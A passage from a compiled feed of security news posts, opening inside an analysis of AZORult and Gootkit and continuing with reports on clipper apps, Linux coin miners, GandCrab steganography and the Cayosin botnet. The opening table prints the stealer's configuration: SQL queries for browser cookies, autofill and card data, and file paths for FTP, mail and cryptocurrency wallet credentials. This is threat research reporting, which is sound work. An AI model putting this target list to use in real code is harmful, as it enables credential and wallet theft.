  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding=”base64″>
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type=”QString”>
  207. <password type=”QString”>
  208. </password>

Table 3: AZORult Configuration file

The multiple references to Browser Cookies and CryptoWallets confirms the “RuntimeBroker5.exe” sample, initially hidden into the cabilet archive,  is an AZORult variant.

Stage 3 – The Payload

The other file download from hairpd[.]com by AZORult’s sample is another executable PE32.

Figure 8: GET request to download the payload.
Hasha75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threatsputik.exe
Descrizione BreveSecond component downloaded by malware. This component is alive after the infection.

Table 4:  Generic information about sputik.exe (Gootkit)

The “sputik.exe” uses a set of evasion techniques to avoid the monitoring of the process, such as invoking the “UuidCreateSequential” API to detect the usage of typical virtual machine’s MAC addresses, but this technique can be easily bypassed by spoofing a real network card one.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant counts several modules written on top of NodeJS technology embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In the past years, Gootkit source code have been leaked online and part of it is also available on the Github platform. This way we were able to investigate differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As general consideration, we noticed a lot of similarities between the codes, they are perfectly compatible, but few differences holds. For instance private keys and certificates have been modified, showing the malware author choose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting italian organization and users revealed interesting connections between two threats we was used to monitor and detect across both the InfoSec community and the CERT-Yoroi’s constituency, revealing a hidden link connecting this particular AZORult instance and with the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used in the initial stages of the attacks by cyber-criminals, showing how the usage of extremely flexible stagers written in high level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

The post Gootkit: Unveiling the Hidden Link with AZORult appeared first on Security Affairs.

An info stealer .exe malware is targeting Mac users around the globe

By Waqas

Cybercriminals have identified a unique method of attacking Mac devices, which involves exploiting executable or .EXE files. Those files that can be executed both on Mac and Windows devices have the potential of infecting Mac computers as these unload a .exe malware. Discovered by Trend Micro researchers, the new malware can bypass the macOS security […]

This is a post from HackRead.com Read the original post: An info stealer .exe malware is targeting Mac users around the globe

New cryptomining malware removes other malware from Linux, then latches onto systems

A script capable of deleting known Linux malware and coin mining software in systems has been discovered by Trend Micro.  It then downloads a cryptocurrency-mining malware as well as install

The post New cryptomining malware removes other malware from Linux, then latches onto systems appeared first on The Cyber Security Place.

88% of UK businesses breached during the last 12 months

The UK’s cyber threat environment is intensifying. Attacks are growing in volume, and the average number of breaches has increased, according to Carbon Black. Key survey research findings: 88% of UK organizations reported suffering a breach in the last 12 months The average number of breaches per organization over the past year was 3.67 87% of organizations have seen an increase in attack volumes 89% of organizations say attacks have become more sophisticated 93% of … More

The post 88% of UK businesses breached during the last 12 months appeared first on Help Net Security.

MetaMask app on Google Play was a Clipboard Hijacker

Security researcher Lukas Stefanko from ESET discovered the first Android cryptocurrency clipboard hijacker impersonating MetaMask on the official Google Play store.

The rogue MetaMask app is a Clipboard Hikacker that monitors a device’s clipboard for Bitcoin and Ethereum addresses and replaces them with addresses of wallets under the control of the attacker. Using this trick the attackers can transfers funds to their wallets.

“This dangerous form of malware first made its rounds in 2017 on the Windows platform and was spotted in shady Android app stores in the summer of 2018. In February 2019, we discovered a malicious clipper on Google Play, the official Android app store.” reads the post published by ESET.

MetaMask clipboard hijacker

The Clipboard Hikacker poses itself as a mobile version of the legitimate service
MetaMask.io which is designed to run Ethereum decentralized apps in a browser, without having to run a full Ethereum node.

However, the legitimate service currently does not offer a mobile app.

Lukas Stefanko discovered that the app was able to steal cryptocurrency using two different attack methods.

The first attack scenario sees attackers using the app to attempt to steal the private keys and seeds of an Ethereum wallet when a user adds it to the app. Once the attackers obtain this data send it to a Telegram account.

The second attack scenario sees attackers monitoring the clipboard for Ethereum and Bitcoin addresses, and when one is detected, replace it with the attackers’ address.

In June 2017, security researchers from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers. Most of the victims are located in Asia, mainly China.

In July 2017, a CryptoCurrency Clipboard Hijackers was discovered by BleepingComputer while monitoring more than 2.3 million addresses.

In March 2018, security researchers at Palo Alto Networks, spotted a strain of malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address to the Windows clipboard. The malicious code then replaces the address in the clipboard with the author’s one.

Pierluigi Paganini

(SecurityAffairs – Clipboard Hikacker, MetaMask)

The post MetaMask app on Google Play was a Clipboard Hijacker appeared first on Security Affairs.

New Linux Crypto-Mining Malware Kills Other Malicious Miners Upon Installation

Security analysts identified a sample of Linux crypto-mining malware that kills any other malicious miners upon installation.

Trend Micro researchers discovered the malware while doing a routine log check after spotting a script within one of their honeypots that began downloading a binary connected to a domain. This binary turned out to be a modified version of the cryptocurrency miner XMR-Stak.

The script didn’t stop at downloading this sample of Linux malware, which Trend Micro detected as Coinminer.Linux.MALXMR.UWEIU. It removed other crypto-mining malware and related services affecting the machine at the time of infection. The malware also created new directories and files and stopped processes that shared connections with known IP addresses.

A Likeness to Other Threats

In their analysis of Coinminer.Linux.MALXMR.UWEIU, Trend Micro found that the malware’s script shares certain attributes with other threats it previously detected. Specifically, researchers observed similarities between this malicious coin miner and Xbash, a malware family discovered by Trend Micro in September 2018 that combines ransomware, cryptocurrency mining, worm and scanner capabilities in its attacks against Linux and Windows servers.

Researchers also noted that the threat’s code is nearly identical to that of KORKERDS, crypto-mining malware Trend Micro uncovered back in November 2018. There are a few differences, however.

The new script simplified the routine by which KORKERDS downloads and executes files and loads the Linux coin malware sample. It also didn’t uninstall security solutions from or install a rootkit on the infected machine. In fact, the script’s kill list targeted both KORKERDS and its rootkit component. This move suggests that those who coded the script are attempting to maximize their profits while competing with the authors of KORKERDS.

Strengthen Your Crypto-Mining Malware Defenses

Security professionals can help defend against Linux crypto-mining malware by using an endpoint management and security platform capable of monitoring endpoints for suspicious behavior. Organizations should also leverage security information and event management (SIEM) tools that can notify security teams of high central processing unit (CPU) and graphics processing unit (GPU) usage — key indicators of cryptocurrency mining activities — during nonbusiness hours.

The post New Linux Crypto-Mining Malware Kills Other Malicious Miners Upon Installation appeared first on Security Intelligence.

Clipper Malware Found Masquerading as Legitimate Service on Google Play Store

Security researchers discovered a sample of clipper malware that targeted Android users by lurking in the Google Play store.

ESET first came across Android/Clipper.C masquerading as MetaMask, a service that allows users to access Ethereum-enabled distributed applications, in February 2019. This new threat is capable of stealing users’ credentials and private keys to gain access to their Ethereum funds. But Android/Clipper.C is a bit more sophisticated: It’s also a form of clipper malware in that it can replace a bitcoin or Ethereum wallet address copied from the clipboard with one under the attacker’s control.

ESET researchers discovered the malicious app on the Google Play store shortly after it became available for download on Feb. 1. They reported their findings to Google’s security team, which subsequently removed the app from the app marketplace.

Android/Clipper.C is not the only malware sample that’s impersonated MetaMask. Other programs used the MetaMask disguise to phish for sensitive data and steal access to users’ cryptocurrency funds.

The Growing Problem of Clipper Malware

Android/Clipper.C is just the latest instance of clipper malware to prey on users. In March 2018, ESET learned about one sample of this threat category targeting Monero users by masquerading as a Win32 Disk Imager application on download.com.

A few months later, Bleeping Computer discovered another cryptocurrency clipboard hijacker that was monitoring 2.3 million cryptocurrency addresses at the time of discovery. Dr.Web also uncovered an Android clipper in summer 2018, though this threat was not available for download on the Google Play store at that time.

How to Defend Against Disguised Malware Threats

Security professionals can help defend against threats like Android/Clipper.C by investing in a unified endpoint management (UEM) solution that can alert users when malware is detected and automatically uninstall infected apps. They should also leverage artificial intelligence (AI) to spot malicious behaviors and stop malware like Android/Clipper.C in its tracks.

The post Clipper Malware Found Masquerading as Legitimate Service on Google Play Store appeared first on Security Intelligence.

A mysterious code prevents QNAP NAS devices to be updated

Users of QNAP NAS devices are reporting through QNAP forum discussions of mysterious code that adds some entries that prevent software update.

Users of the Network attached storage devices manufactured have reported a mystery string of malware attacks that disabled software updates by hijacking entries in host machines’ hosts file.

According to the users, the malicious code adds some 700 entries to the /etc/hosts file that redirects requests to IP address 0.0.0.0.

QNAP TS-253A

The user ianch99 in the QNAP NAS community forum reported that the antivirus ClamAV was failing to update due to 0.0.0.0 clamav.net host file entries.

“Since recent firmware updates, the ClamAV Antivirus fails to update due to 700+ clamav.net entries in /etc/hosts, all set to 0.0.0.0 e.g.” wrote
the user ianch99.

“0.0.0.0 bugs.clamav.net
0.0.0.0 current.cvd.clamav.net
0.0.0.0 database.clamav.net
0.0.0.0 db.local.clamav.net
0.0.0.0 update.nai.com
0.0.0.0 db.ac.clamav.net
0.0.0.0 db.ac.ipv6.clamav.net
0.0.0.0 db.ac.big.clamav.net
<snip>

As they are all set to 0.0.0.0, the ClamAV update fails. If you remove these entries, the update runs fine but they return on after rebooting.”

Other users reported similar problems with the MalwareRemover, but it is still unclear if the events are linked.

QNAP provided a script that could help users to restore normal operations deleting the mysterious entries.

QNAP hasn’t confirmed that the incidents were caused by a malware.

“Exposing your NAS on the internet (allowing remote access) is always a high risk thing to do (at least without a properly deployed remote access VPN and/or 2FA on all existing user accounts)!” wrote the user P3R.

“The real problems that I see with Qnap are:

  • The marketing is pushing the private cloud message and tell users that the Qnap solution is a secure way to deploy it. Unfortunately the first part is very attractive to users that doesn’t understand the risks and the last part is a lie.
  • Qnap have many dangerous things enabled by default and/or without sufficient warnings about the risks.”

Pierluigi Paganini

(SecurityAffairs – NAS, hacking)

The post A mysterious code prevents QNAP NAS devices to be updated appeared first on Security Affairs.

Encrypted malware: a threat facilitated by the GDPR?

Encrypted malware

One of the positive consequences of the increased concern for personal and corporate cybersecurity is the fact that Internet user are increasingly vigilant with their data and who they share it with. At the same time, online platforms have intensified their efforts to provide secure, private browsing in order to safeguard their and their users’ information.

And this trend is on the up. According to the Global Internet Phenomena Report, written by Sandvine, even very conservative estimates suggest that over 50% of Internet traffic is encrypted. And more and more platforms are turning to end-to-end encryption to ensure that their communications are private.

The GDPR encourages even more encryption

There are several factors that have contributed to the growth of encrypted traffic. It is not simply down to the enormous concern shown by users and companies; legal regulations have also had a hand in it. The GDPR states that companies that handle data “should evaluate the risks inherent in the processing and implement measures to mitigate those risks, such as encryption,” that “should ensure an appropriate level of security, including confidentiality, taking into account (…) the nature of the personal data to be protected.”

In fact, beyond companies own willingness to encrypt their communications, there are two cases where the GDPR requires encryption: firstly, when it considers that there is a high risk that this data will be breached; secondly, when said organizations use this data for a different purpose than that expressed to the user when their data was requested. A lack of encryption, therefore, can mean that offending companies are infringing the GDPR (and thus facing the subsequent sanctions of up to €20 million or 4% of the company’s global annual turnover). But that’s not all; encryption can also be of help to these companies, since, if they were to suffer a cyberattack, they wouldn’t need to inform their users about it if their information is correctly encrypted and protected.

A window for encrypted malware

However, all of this has its downside; encrypted traffic is already becoming one of the largest niches for cybercrime: according to Ixia’s 2018 Security Report, cybercriminals are starting to carry out attacks in this kind of traffic. In fact, Gartner states that half of cyberattacks carried out in 2019 using malware will use some kind of encryption, while by 2020, the figure is set to rise to 70%.

There are two particularly worrying things about encrypted malware: the first is the fact that it can be found on platforms that have encrypted traffic; this means that users, believing themselves to be safe, let their guard down, trust the platform, and thus become more vulnerable. The second is the fact that this malicious software can to hide its true nature, meaning that some cybersecurity systems do not detect it until it is too late.

How to avoid encrypted malware attacks

If a company wants to avoid attacks that use encrypted malware, they need to follow a series of measures that will keep their corporate cybersecurity safe:

1.- Vigilant browsing. When employees are browsing the Internet, they must exercise caution, even when they are on private platforms whose traffic is being encrypted. Although the platform may seem safe to browse, employees need to be as vigilant as they would be in any other circumstances.

2.- Monitoring of processes. Since encrypted malware has the ability to slip past some traditional protection solutions, being able to constantly monitor everything that is happening on the system is more important than ever. Panda Adaptive Defense actively monitors all systems processes in real time, which means that it is able to proactively detect anomalous activity and stop infections before they happen.

3.- Offline backups and online files. There are ever more companies that, when it comes to safeguarding their information, choose to double up: firstly by storing a large part of their information in the cloud, so that their physical devices are not affected in case of infection. Secondly, by storing secure backups offline, to keep them from being affected by a possible a posteriori infection.

Encrypted traffic is hugely important to help make networks more secure, and to keep all our information safe; but this doesn’t mean that it is totally attack-proof. Therefore, the more sophisticated cybercriminals become, the more companies should exercise proactive precaution.

The post Encrypted malware: a threat facilitated by the GDPR? appeared first on Panda Security Mediacenter.

First Android Clipboard Hijacking Crypto Malware Found On Google Play Store

A security researcher has discovered yet another cryptocurrency-stealing malware on the official Google Play Store that was designed to secretly steal bitcoin and cryptocurrency from unwitting users. The malware, described as a "Clipper," masqueraded as a legitimate cryptocurrency app and worked by replacing cryptocurrency wallet addresses copied into the Android clipboard with one belonging

What is an advanced persistent threat (APT)? And 5 signs you’ve been hit with one

Do you have valuable data on your network? Noticing odd network behavior? You could be the victim of an APT attack. An advanced persistent threat (APT) is a cyberattack executed

The post What is an advanced persistent threat (APT)? And 5 signs you’ve been hit with one appeared first on The Cyber Security Place.

BEC-style attacks exploded in Q4 2018

Email remains the top vector for malware distribution and phishing, while BEC fraud continues to grow rapidly, Proofpoint warns in its Q4 2018 Threat Report. “The number of email fraud attacks against targeted companies increased 226% Quarter-on-Quarter and 476% vs. Q4 2017,” the company pointed out. “On average, companies targeted by BEC received about 120 fraudulent emails in the fourth quarter of the year, up from 36 in Q3 2018 and up from 21 in … More

The post BEC-style attacks exploded in Q4 2018 appeared first on Help Net Security.

Zero trust browsing: Protect your organization from its own users

To the casual observer, the cyberattack landscape is constantly shifting. In recent years, the threats and scams have evolved from Nigerian princes to stranded travelers, pop-ups warning of outdated software to ransomware, cryptojacking, phishing and spear phishing. Predictions for 2019 are full of dire warnings about the very-real explosion of phishing, backed by geometric increases in phishing sites as the number of malware sites drops. Just as 2018 predictions focused on cryptojacking and ransomware were … More

The post Zero trust browsing: Protect your organization from its own users appeared first on Help Net Security.

New Linux coin miner kills competing malware to maximize profits

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner.

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner, researchers observed it killing other Linux malware and coin miners present on the infected machine.

coin miner linux-deletes-other-malware_1

The experts detected a coinminer script on one of their honeypots and, the malicious code shares some parts with the Xbash malware and the KORKERDS cryptocurrency miner that leverages rootkit to avoid detection.

“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS.” reads the analysis published by Trend Micro.

“It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”

Experts noticed that this specific variant of KORKERDS leverages the rootkit to download a binary of a modified version of a universal Stratum XMR-Stak pool miner.

According to the experts, the infection started from some IP cameras and web services via TCP port 8161, where the attacker attempts to upload a crontab file.

The crontab file allows to launch a second stage that implements the following three functions:

  • Function B kills previously installed malware, coin miners, and all related services referenced to an accompanying malware (detected by Trend Micro as SH.MALXMR.UWEIU). It also creates new directories, files, and stop processes with connections to identified IP addresses.
  • Function D downloads the coin miner binary from hxxp://yxarsh.shop/64 and runs it.
  • Function C downloads a script from hxxp://yxarsh.shop/0, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh.shop/1.jpg and puts it in different crontabs.

The malware attempts to hide its presence by clearing system logs and achieve persistence using implanted crontab files.

Compared to the original KORKERDS cryptocurrency miner, the new script improved the way it downloads and executes the files. It inserts a single crontab that fetches all the code and the miner component.

“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit.” concludes Trend Micro.

Further details, including indicators of compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – coin miner, malware)

The post New Linux coin miner kills competing malware to maximize profits appeared first on Security Affairs.

Security Affairs: New Linux coin miner kills competing malware to maximize profits

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner.

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner, researchers observed it killing other Linux malware and coin miners present on the infected machine.

coin miner linux-deletes-other-malware_1

The experts detected a coinminer script on one of their honeypots and, the malicious code shares some parts with the Xbash malware and the KORKERDS cryptocurrency miner that leverages rootkit to avoid detection.

“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS.” reads the analysis published by Trend Micro.

“It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”

Experts noticed that this specific variant of KORKERDS leverages the rootkit to download a binary of a modified version of a universal Stratum XMR-Stak pool miner.

According to the experts, the infection started from some IP cameras and web services via TCP port 8161, where the attacker attempts to upload a crontab file.

The crontab file allows to launch a second stage that implements the following three functions:

  • Function B kills previously installed malware, coin miners, and all related services referenced to an accompanying malware (detected by Trend Micro as SH.MALXMR.UWEIU). It also creates new directories, files, and stop processes with connections to identified IP addresses.
  • Function D downloads the coin miner binary from hxxp://yxarsh.shop/64 and runs it.
  • Function C downloads a script from hxxp://yxarsh.shop/0, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh.shop/1.jpg and puts it in different crontabs.

The malware attempts to hide its presence by clearing system logs and achieve persistence using implanted crontab files.

Compared to the original KORKERDS cryptocurrency miner, the new script improved the way it downloads and executes the files. It inserts a single crontab that fetches all the code and the miner component.

“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit.” concludes Trend Micro.

Further details, including indicators of compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – coin miner, malware)

The post New Linux coin miner kills competing malware to maximize profits appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 200 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Can Enterprises execute a GRC Movement?
Experts observed a new sextortion scam Xvideos-themed
Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail
Experts found popular beauty apps in the Play Store including malicious code
Metro Bank is the first bank that disclosed SS7 attacks against its customers
QuadrigaCX exchange lost access to $145 Million funds after founder dies
Security firm Recorded Future discovered the hacker behind Collection #1
Young hacker gets 10 years jail sentence for SIM Swapping attacks
Roughly 500,000 Ubiquiti devices may be affected by flaw already exploited in the wild
Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild
Severe bug in LibreOffice and OpenOffice suites allows remote code execution
SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM.
A critical counterfeiting vulnerability addressed in Zcash
New ExileRAT backdoor used in attacks aimed at users in Tibet
Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients
Security expert Marco Ramilli released for free the Malware Hunter tool
Android devices could be hacked by viewing a malicious PNG Image
Expert publicly disclosed the existence of 0day flaw in macOS Mojave
Ursnif: Long Live the Steganography and AtomBombing!
Hackers broke into Australias Parliament Computer Network
NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions
Phishing campaign leverages Google Translate as camouflage
Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild
Vulnerabilities in Kunbus Industrial Gateway allows to control the devices
Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem
GandCrab ransomware campaign targets Italy using steganography

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 200 – News of the week appeared first on Security Affairs.

Clipper malware on Play Store replaces users BTC & ETH wallet address

By Waqas

This is the first ever Clipper malware found on Play Store. Another day another Android malware on Google Play Store – This time the IT security researchers at ESET have discovered a malware known for replacing the content of clipboard on the targeted device. This type of malware is called Clipper malware. The malware was targeting Android […]

This is a post from HackRead.com Read the original post: Clipper malware on Play Store replaces users BTC & ETH wallet address

GandCrab ransomware campaign targets Italy using steganography

A newly discovered malware campaign leverages steganography to hide GandCrab ransomware in an apparently innocent Mario image.

Security experts at Bromium have discovered a malware campaign using steganography to hide the GandCrab ransomware in a Mario graphic package.

According to Matthew Rowan, a researcher at Bromium, threat actors use steganography to hide the malicious code and avoid AV detection.

The steganography is used in conjunction with heavily obfuscated Microsoft PowerShell commands that attackers have hidden within the color channels of a picture of Mario, in a particularly manipulating
blue and green pixels.

Steganographic techniques such as using the low-bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack.” reads the analysis published by Rowan.

“A manual re-shuffle to de-obfuscate the code and you can see more clearly the bitwise operation on the blue and green pixels. Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within.”

This technique makes the threat hard to be detected by firewall and other defence systems.

Experts pointed out that attackers are targeting users in Italy, but the campaign will likely extend to other countries worldwide.

“The manually de-obfuscated PowerShell reveals the final level which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example if the culture is Italian, which matches the earlier targeting attempts).” continues the expert.

steganography campaign.png

Experts were able to download the samples from the address in the de-obfuscated Powershell, including from an Italy-based VPN, and discovered several samples of the Gandcrab ransomware.

Additional details, including IoCs are reported in the analysis published by the security firm Bromium

Pierluigi Paganini

(SecurityAffairs – steganography, hacking)


The post GandCrab ransomware campaign targets Italy using steganography appeared first on Security Affairs.

PNG Image File Security Flaw Could Give Hackers Access to Your Android Phone

Most people will get pictures of cute animals and other funny memes sent to them throughout the day. In many

PNG Image File Security Flaw Could Give Hackers Access to Your Android Phone on Latest Hacking News.

Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem

Cayosin Botnet: a deeper look at this threat supported by the psychological profile of the “youngsters-wannabe-hackers” Rolex boasters

Cayosin Botnet

Money, botnet as service business and coding on the dark side of the life: “At this point of my life… if it doesn’t make me money, I don’t make time for it”, is stated in the picture below.

Or elsewhere the same threat actor pronounces a more blatantly made statement in a sentence that sounds like “I am not scared by the death, I am scared more to not live a pleasant life.”

Cayosin Botnet
Image downloaded by Odisseus
from the Instagram profile of the threat actor

This is the “new” motto of those youngsters-wannabe-hackers: botnet providers, sellers, coders, “boaters” driving in the night with the laptop ever connected aside. In the imaginary world of a teen the adults world becomes a violent jungle dominated by the dark colors of the delirium of omnipotence.  Botnet, packet flooding, bots, power of attack: “I don’t care how many and what bots I have, all I care is only to have stable stress power”.

It is in this psychedelic context that the Cayosin botnet has seen the light and for the first time has been reversed and analyzed (the report is here) by “unixfreaxjp” from the MalwareMustDie team. 

The analysis is sapient and clear: in the reversed samples there are many traces of a collection of attacks that lead to a collection of different source codes.

One of them is the Layer 7 (HTTP) Attack reported in the picture below documenting how this kind of malware can evade the anti-DDoS solutions like Cloudfare.

Cayosin Botnet

From the unixfreaxjp’s Cayosin botnet binary analysis we can understand that the core of the artifact is the “integration” of different botnet source codes, as it is also well documented by reading the now deleted Instagram profile of the 13 years old scriptbots/unholdable, who implemented this Botnet . STD attack, Tsunami, Christmas DDoS attacks were adapted from Kaiten botnet, along with more flood combination taken from Qbot/Lizkebab/Torlus/Gafgyt variants: multiple attack methods integrating multiple source code in the same artifact and provided a “As a Service” to other teens or threat actors and sold offhandedly on Instagram. From Mirai source code the Cayosin was taken the table scheme to hide strings used by the botnet to hack the login credential of the vulnerable telnet accounts for known IOT devices, along with other Mirai botnet functionalities. Obviously, the coder was not updating much feature of the C2 which explains how the base protocol of the botnet is still made by Qbot/Torlus basis.

A ready-to-use botnet build to be sold for $20 a month, “full options” on sale with an expiry token and functionalities that were able to ban the users who didn’t renew the expired “licence”.

The combination of more capabilities of the botnet has been well documented also by PERCH Security Threat Report who made a great analysis on it, confirming the combination of these functionalities used in Cayosin along with the deeper OSINT investigation of the threat source.

PERCH report states: “Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference”, like GPON attack that was documented on the Instagram profile of the crew, so clearly that an external observer could have easily view of the day by day findings of new exploits  and methods then implemented in the malware to enrich  the harmful capability of the new “product”.

They candidly state this in their Instagram Stories: “New Methods, DM me if you want to know more.”

Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

PERCH has understood it well, in fact writes: “This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.”

At this point is not excluded that Cayosin is only an evolution of many other botnets made always by the same threat actor (or crew) and in particular of the botnet named Messiah. In the following is reported the advertising of the Messiah botnet with its features which remember Cayosin botnet capabilities. Check the following exclusive image:

  • Features:  Admin of accounts, Add user commands, Kick user commands, Full chat, On line user list, Bot limits for account, Full bot type list, Port Scanner and Resolver
  • Methods: Reg UDP, Reg TCP, STD Hex, CNC Flood, Stomp Flood, Xmas and VSE
  • Replication Exploits: GPON, Telnet, Realtek, Tr064, Huawai
Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

What we learn from the evolving of botnets is the adaptation of the source codes, once one bad actor coder starts to implement something different and other actor coders find it useful, they adapt the capability by merging source codes. Each of coders and botnet provider is racing with others to present their technology of their botnet is better, to attract the market: Youngster and Actors who interest to rent the best service.

